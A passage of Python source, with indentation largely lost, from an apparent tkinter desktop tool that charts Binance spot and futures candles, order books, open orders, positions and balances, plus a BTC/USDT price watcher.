PnL_Pos_L = BnFAcc1['unRealizedProfit']
if str(BnFAcc1['positionSide'])=='SHORT':
#print (BnFAcc1['positionSide'])
app.graph_Cn.coords(GPEP_S, -500,y_liq,800,y_liq)
PnL_Pos_S = BnFAcc1['unRealizedProfit']
app.graph_Cn.coords(GEPt, 105, y_liq)
app.graph_Cn.itemconfigure(GEPt,text='Position: ' + str(BnFAcc1['positionSide']) + ' Price: '+ str(float(BnFAcc1['entryPrice']))+'\n'+'Amt: ' + str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))+ ' USDT')
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
TO_Tpl_Tmp=[]
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
TO_It.append('-')
TO_Tpl_Tmp.append(TO_It)
#print(TO_Tpl_Tmp)
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
PnL_dif = -(PEP * PPA - float(BnFAcc1['stopPrice']) * PPA)
app.graph_Cn.coords(GPSP, -500,y_liq,800,y_liq)
app.graph_Cn.coords(GPSP_txt, 600,y_liq)
app.graph_Cn.itemconfigure(GPSP_txt,text=('Stop-Loss. Price: '+ str(BnFAcc1['stopPrice']) + '\n') + "%.2f" % (PnL_dif) + ' USDT')
PSP = float(BnFAcc1['stopPrice'])
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_SL.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_TP.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if y_liq > 1000:
Ltmp = app.graph_Cn.configure()
#print(Ltmp['scrollregion'][4])
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],Ltmp1[1],Ltmp1[2],y_liq+200))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
PPP=y_liq
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_TP.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_SL.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
PnL_dif = -(PEP * PPA - float(BnFAcc1['stopPrice']) * PPA)
app.graph_Cn.coords(GPPP, -500,y_liq,800,y_liq)
app.graph_Cn.coords(GPPP_txt,600,y_liq)
app.graph_Cn.itemconfigure(GPPP_txt,text=('Take-profit. Price: '+ str(BnFAcc1['stopPrice']) + '\n') + "%.2f" % (PnL_dif) + ' USDT')
if y_liq < -500:
Ltmp = app.graph_Cn.configure()
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],y_liq-200,Ltmp1[2],Ltmp1[3]))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='LIMIT' and str(BnFAcc1['type'])=='LIMIT':
#print(BnFAcc1)
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
lo = TO_CC+1
TO_SCh = True
if TO_CC > 0:
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
#print(TO_It[0],TO_It[1],TO_It[2],TO_It[3])
if TO_It[0] == str(BnFAcc1['positionSide']) and TO_It[1] == str(BnFAcc1['side']) and float(TO_It[2]) == float(BnFAcc1['price']) and float(TO_It[3]) == float(BnFAcc1['origQty']):
app.Tree_Ord.item(nm, values=(str(BnFAcc1['positionSide']),str(BnFAcc1['side']),str(BnFAcc1['price']),str(BnFAcc1['origQty']),
str(BnFAcc1['origType'])))
TO_Tpl_Tmp[nm-1][5]='+'
TO_SCh = False
#print(TO_It[0],TO_It[1],TO_It[2],TO_It[3])
if TO_SCh == True and float(BnFAcc1['price']) != 0:
#print(TP_It)
#print(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']))
app.Tree_Ord.insert(parent='',index='end',iid=lo,text='',values=(str(BnFAcc1['positionSide']),str(BnFAcc1['side']),str(BnFAcc1['price']),str(BnFAcc1['origQty']),
str(BnFAcc1['origType'])))
lo +=1
#print(TO_Tpl_Tmp)
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
TO_Tpl_Tmp2=[]
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
TO_Tpl_Tmp2.append(app.Tree_Ord.item(nm)["values"])
#print(TO_Tpl_Tmp)
#print(TO_Tpl_Tmp2)
for nm in range(1,TO_CC+1):
if nm-1 <= len(TO_Tpl_Tmp)-1 and len(TO_Tpl_Tmp)>0 :
if TO_Tpl_Tmp[nm-1][5] == '-' or TO_Tpl_Tmp[nm-1][5] == '':
TO_Tpl_Tmp2[nm-1][2] = '0'
TO_Tpl_Tmp2[nm-1][3] = '0'
kk=0
nm_d=False
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
if float(TO_Tpl_Tmp2[nm-1][2]) == 0 and float(TO_Tpl_Tmp2[nm-1][3]) == 0 and kk<=len(TO_Tpl_Tmp2):
nm_d=True
km=False
for mn in range(kk,len(TO_Tpl_Tmp2)):
#print(mm)
if float(TO_Tpl_Tmp2[mn][2])!=0 and float(TO_Tpl_Tmp2[mn][3])!=0 and km==False:
app.Tree_Ord.item(nm, values=(TO_Tpl_Tmp2[mn][0],TO_Tpl_Tmp2[mn][1],TO_Tpl_Tmp2[mn][2],TO_Tpl_Tmp2[mn][3],TO_Tpl_Tmp2[mn][4],TO_Tpl_Tmp2[mn][5]))
kk=mn+1
#print(nn,kk,mm)
km=True
if nm_d==True and km==False:
kk=len(TO_Tpl_Tmp2)+1
else:
#print(nn,kk)
if nm_d==True and kk<TO_CC:
app.Tree_Ord.item(nm, values=(TO_Tpl_Tmp2[kk][0],TO_Tpl_Tmp2[kk][1],TO_Tpl_Tmp2[kk][2],TO_Tpl_Tmp2[kk][3],TO_Tpl_Tmp2[kk][4],TO_Tpl_Tmp2[kk][5]))
if TO_Tpl_Tmp2[kk][0] == 'LONG':
app.Tree_Ord.item(nm,tags=('long'))
elif TO_Tpl_Tmp2[kk][0] == 'SHORT':
app.Tree_Ord.item(nm,tags=('short'))
app.Tree_Ord.tag_configure('long', background='#d6f8d6')
app.Tree_Ord.tag_configure('short', background='#fce7e7')
kk +=1
if kk > len(TO_Tpl_Tmp2) and nm<=TO_CC+1:
app.Tree_Ord.delete(nm)
elif len(BnFAcc) == 0:
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
if TO_CC > 0:
app.Tree_Ord.delete(*app.Tree_Ord.get_children())
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
if TO_CC >= len(GLO_L) and TO_CC >= len(GLO_S):
jj = TO_CC
elif TO_CC <= len(GLO_L) and len(GLO_L) >= len(GLO_S):
jj = len(GLO_L)
elif TO_CC <= len(GLO_S) and len(GLO_S) >= len(GLO_L):
jj = len(GLO_S)
GLO_L_Ci = 0
GLO_S_Ci = 0
for nm in range(jj):
if nm < TO_CC:
TO_It = app.Tree_Ord.item(nm+1)["values"]
if str(TO_It[0])== 'LONG':
y_liq = float(TO_It[2])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.coords(GLO_L[GLO_L_Ci],800,y_liq,900,y_liq)
app.graph_Cn.coords(GLO_L_txt[GLO_L_Ci],800,y_liq)
app.graph_Cn.itemconfigure(GLO_L_txt[GLO_L_Ci],text='Order LONG\n'+str(TO_It[2]))
GLO_L_Ci +=1
elif str(TO_It[0])== 'SHORT':
y_liq = float(TO_It[2])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.coords(GLO_S[GLO_S_Ci],800,y_liq,900,y_liq)
app.graph_Cn.coords(GLO_S_txt[GLO_S_Ci],800,y_liq)
app.graph_Cn.itemconfigure(GLO_S_txt[GLO_S_Ci],text='Order SHORT\n'+str(TO_It[2]))
GLO_S_Ci +=1
if len(GLO_L) > GLO_L_Ci-1:
for nm in range (int(GLO_L_Ci),len(GLO_L)):
app.graph_Cn.coords(GLO_L[nm],0,0,0,0)
app.graph_Cn.coords(GLO_L_txt[nm],0,0)
app.graph_Cn.itemconfigure(GLO_L_txt[nm],text='')
if len(GLO_S) > GLO_S_Ci-1:
for nm in range (int(GLO_S_Ci),len(GLO_S)):
app.graph_Cn.coords(GLO_S[nm],0,0,0,0)
app.graph_Cn.coords(GLO_S_txt[nm],0,0)
app.graph_Cn.itemconfigure(GLO_S_txt[nm],text='')
#Order Book Graph
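                        #NOTE: the point lists built in the loop below are never drawn on a canvas in this block;
                        #the loop only refreshes the GAP price line and the GAPt label from the best bid (m==0).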
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
#y0 = grMd + grSt/2 - ((float(mylist4[m][0])-yI0)/prSt)* grSt
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if m==0:
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Cn.coords(GAP, -500, y0, 800, y0)
app.graph_Cn.coords(GAPt, 805, y0)
if len(PnL_Pos_L) > 0 and len(PnL_Pos_S) > 0:
sTmp = '\n' + 'Price: ' + str(float(mylist4[m][0]))
else:
sTmp = 'Price: ' + str(float(mylist4[m][0]))
if len(PnL_Pos_L) > 0:
sTmp += '\n'+'Long PnL: ' + str(PnL_Pos_L)
if len(PnL_Pos_S) > 0:
sTmp += '\n'+'Short PnL: ' + str(PnL_Pos_S)
app.graph_Cn.itemconfigure(GAPt,text=sTmp)
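#______________Helper sketch: price -> canvas Y mapping (illustration only)
#The timers above repeat the expression grMd - ((price - yI0)/(prSt*10))*grSt for every
#high/low/open/close they plot. The same mapping as a standalone function; the parameter
#names mirror the globals used above (grMd = vertical canvas middle, yI0 = reference price,
#prSt = price tick size, grSt = pixels per price step). It is not called by the GUI code.
def price_to_canvas_y(price, grMd, yI0, prSt, grSt):
    #Higher prices map to smaller Y because the tkinter canvas Y axis grows downwards.
    return grMd - ((float(price) - yI0) / (prSt * 10)) * grSt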
#______________Timer for plotting the SPOT and FUTURES Candle chart of the pair
class Timer_Candle_Summ:
def __init__(self):
global TE_CndSm
global ss
global yI
global Lo
while True:
if PS1 == True:
sys_msg = ' SPOT/FUTURES Comparison candlestick chart ' + grSmb + ' is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = True
break
if should_run_S:
for i in range(400):
if not should_run_S:
sys_msg = ' SPOT/FUTURES Comparison candlestick chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_S:
if i==0:
sys_msg = ' SPOT/FUTURES Comparison candlestick chart ' + grSmb + ' is running.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = False
if i > 0:
time.sleep(0.5)
myTup_DSp = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
mylist5_Sp=mylist3_Sp['asks'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=500)) #tupl
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
mylist5_Ft=mylist3_Ft['asks'] #list
#print(myTup11[1])
#sss41 = "BNBUSDT - trades"
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI0=float(myDicGr1Sp[287][1])
#print (myDicGr1[1][1])
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI0=float(myDicGr1Ft[287][1])
#print (yI0)
if i==0:
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
app.graph_Sm.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
ss = ""
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
GAP_Sp = app.graph_Sm.create_line(points,fill="blue",width=1,dash=(4,2))
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue")
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue")
elif prSt < 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue")
yp=1180
ypi=0
while yp > -500:
points=[]
yp = 1180 - ypi*12*4#12*4=1hour
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+36000-ypi*3600
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%H:%M")
app.graph_Tb.create_text(1180 - ypi*48,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*48,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1Sp)):
myDicGr1TT = myDicGr1Sp[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#print (len(myDicGr1))
for mm in range(len(myDicGr1Ft)):
myDicGr1TT = myDicGr1Ft[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 696 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
                            flc = "black" #the FUTURES overlay candles are drawn in black regardless of direction
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#__Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5_Ft))):
if float(mylist5_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5_Ft[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
if float(mylist4_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4_Ft[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
if m==0:
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Sm.coords(GAP_Sp, -500, y0, 800, y0)
app.graph_Sm.itemconfigure(GAP_SpT,text=float(mylist4_Ft[m][0]))
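#______________Reference sketch: raw Binance kline field order
#The chart timers index kline rows by bare position (row[1], row[4], row[8], ...).
#This is the documented order of those fields; the constants are a readability aid
#only and are not used by the code above.
KLINE_OPEN_TIME = 0   #ms timestamp, used for the X coordinate
KLINE_OPEN = 1
KLINE_HIGH = 2
KLINE_LOW = 3
KLINE_CLOSE = 4
KLINE_VOLUME = 5      #plotted on graph_VV
KLINE_CLOSE_TIME = 6
KLINE_QUOTE_VOLUME = 7
KLINE_TRADES = 8      #trade count, also plotted on graph_VV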
#______________BTC/USDT watcher timer
class Timer_BTCUSDT:
def __init__(self):
global TE_BU
while True:
if PS_BU == False:
sys_msg = ' BTC/USDT watcher is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_BU = True
break
if should_run_BU:
for i in range(400):
if not should_run_BU:
#print('Stopped...')
ss_BU = 'Stopped...' + '\n BTC/USDT watcher'
app.label_BU.config(text = ss_BU)
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
sys_msg = ' BTC/USDT watcher will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_BU:
if i==0:
sys_msg = ' BTC/USDT watcher is running.'
app.Sys_Msg(text1=sys_msg)
TE_BU = False
if i > 0:
time.sleep(0.5)
myTupSpK =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=5)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI_Sp_0=0
yI_Sp_1=0
for ii in range(len(myDicGr1Sp)):
if ii == 0:
yI_Sp_1=float(myDicGr1Sp[ii][3])
if float(myDicGr1Sp[ii][2])>yI_Sp_0:
yI_Sp_0=float(myDicGr1Sp[ii][2]) #High
                            if float(myDicGr1Sp[ii][3])<yI_Sp_1: #track the lowest Low (column 3)
                                yI_Sp_1=float(myDicGr1Sp[ii][3]) #Low
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=5)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI_Ft_0=0
yI_Ft_1=1
for ii in range(len(myDicGr1Ft)):
if ii == 0:
yI_Ft_1=float(myDicGr1Ft[ii][3])
if float(myDicGr1Ft[ii][2])>yI_Ft_0:
yI_Ft_0=float(myDicGr1Ft[ii][2]) #High
                            if float(myDicGr1Ft[ii][3])<yI_Ft_1: #track the lowest Low (column 3)
                                yI_Ft_1=float(myDicGr1Ft[ii][3]) #Low
ss_BU = 'SPOT: xx%, FUTURES xx%'
myTup_DSp = ('depth', bot.depth(symbol='BTCUSDT', limit=5)) #tupl
#print('SPOT D',myTup_DSp)
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol='BTCUSDT', limit=5)) #tupl
#print('FT D',myTup_DFt)
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%H:%M:%S] ")
xx1 = (float(mylist4_Sp[0][0])-yI_Sp_0)/(float(mylist4_Sp[0][0])/100)
ss_BU = time_local_str + 'SPOT: ' + "%.2f" % (xx1) + '%, '
xx2 = (float(mylist4_Ft[0][0])-yI_Ft_0)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx2) + '%, '
xx3 = (float(mylist4_Sp[0][0])-yI_Sp_1)/(float(mylist4_Sp[0][0])/100)
ss_BU += '\n' + time_local_str + 'SPOT: ' + "%.2f" % (xx3) + '%, '
xx4 = (float(mylist4_Ft[0][0])-yI_Ft_1)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx4) + '%, '
app.label_BU.config(text = ss_BU)
if (xx3<0 and xx4<0) or ((xx1<-0.25 and xx2<-0.25) and (-xx1>xx3 and -xx2>xx4)):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='pink'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='red'
elif (xx1>0 and xx2>0) or ((xx3>0.25 and xx4>0.25)and (xx3>(-xx1) and xx4>(-xx2))):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='lightgreen'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='green'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
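#______________Helper sketch: percent distance used by the BTC/USDT watcher
#The watcher computes (best_bid - recent_extreme)/(best_bid/100), i.e. the distance
#from the 5-minute high/low as a percentage of the current bid. A standalone version
#(a sketch, assuming a non-zero bid; not called by the timer above):
def pct_from_extreme(best_bid, extreme):
    return (float(best_bid) - float(extreme)) / (float(best_bid) / 100.0)
#pct_from_extreme(30000.0, 30300.0) -> -1.0 (one percent below the recent high)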
#______________Balance Observer Timer
class Timer_AccBlns:
def __init__(self):
global TE_AB
i=0
while True:
if PS_AB == False:
sys_msg = ' Balance Observer is stopped.'
app.Sys_Msg(text1=sys_msg)
TE_AB = True
break
if should_run_AB:
#for i in range(400):
if not should_run_AB:
#print('Stopped...')
sys_msg = ' Balance Observer will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_AB:
if i==0:
sys_msg = ' Balance Observer is running.'
app.Sys_Msg(text1=sys_msg)
TE_AB = False
if i > 0:
time.sleep(0.5)
BnAcc = bot.account()
BnAcc10 = BnAcc['balances']
                    ss = 'SPOT balance: '
#print(BnAcc10)
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if BnAcc101['asset'] =='USDT':
#print (BnAcc10[mm])
ss += str(BnAcc101['asset']) + "\nFree: " + str(BnAcc101['free']) + "USDT.\nLocked: " + str(BnAcc101['locked']) + ' USDT.'
app.label_BlnsSpt.config(text = ss)
BnFAcc = bot.futuresBalance()
#print(BnFAcc)
                    ss = 'FUTURES balance: '
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
#print(BnFAcc[mm])
ss += str(BnFAcc1['asset']) + '.'
ss += "\nAsset: " + str(BnFAcc1['balance']) + ".\nAvailable: " + str(BnFAcc1['withdrawAvailable'])
app.label_2.config(text = ss)
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES positions:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['totalUnrealizedProfit']
ss += 'PnL: ' + str(BnFAcc1) + ' USDT'
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str_H=time_local_time.strftime("%H")
ss += '\n'
if float(time_local_str_H)>=11 and float(time_local_str_H)<=19:
ss += 'London '
if (float(time_local_str_H)>=16 and float(time_local_str_H)<=23) or float(time_local_str_H)==0:
ss += 'New York '
if float(time_local_str_H)>=0 and float(time_local_str_H)<=8: #1..9
ss += 'Sydney '
if float(time_local_str_H)>=2 and float(time_local_str_H)<=10: #3..11
ss += 'Tokyo '
app.label_PnL.config(text = ss)
BnFAcc=bot.userPositionInfo()
                    TrSc_P=app.Tree_Pos.yview() #remember the scroll position as a (top, bottom) fraction pair
#print(TrSc_P)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
l = TP_CC+1
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if len(BnFAcc1)>0:
TP_SCh = True
if TP_CC > 0:
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
if TP_It[1] == str(BnFAcc1['symbol']) and TP_It[0] == str(BnFAcc1['positionSide']):
app.Tree_Pos.item(nn, values=(str(BnFAcc1['positionSide']),str(BnFAcc1['symbol']),str(BnFAcc1['leverage']),str(BnFAcc1['unRealizedProfit']),
str(BnFAcc1['entryPrice']),str(BnFAcc1['markPrice']),str(BnFAcc1['liquidationPrice']),
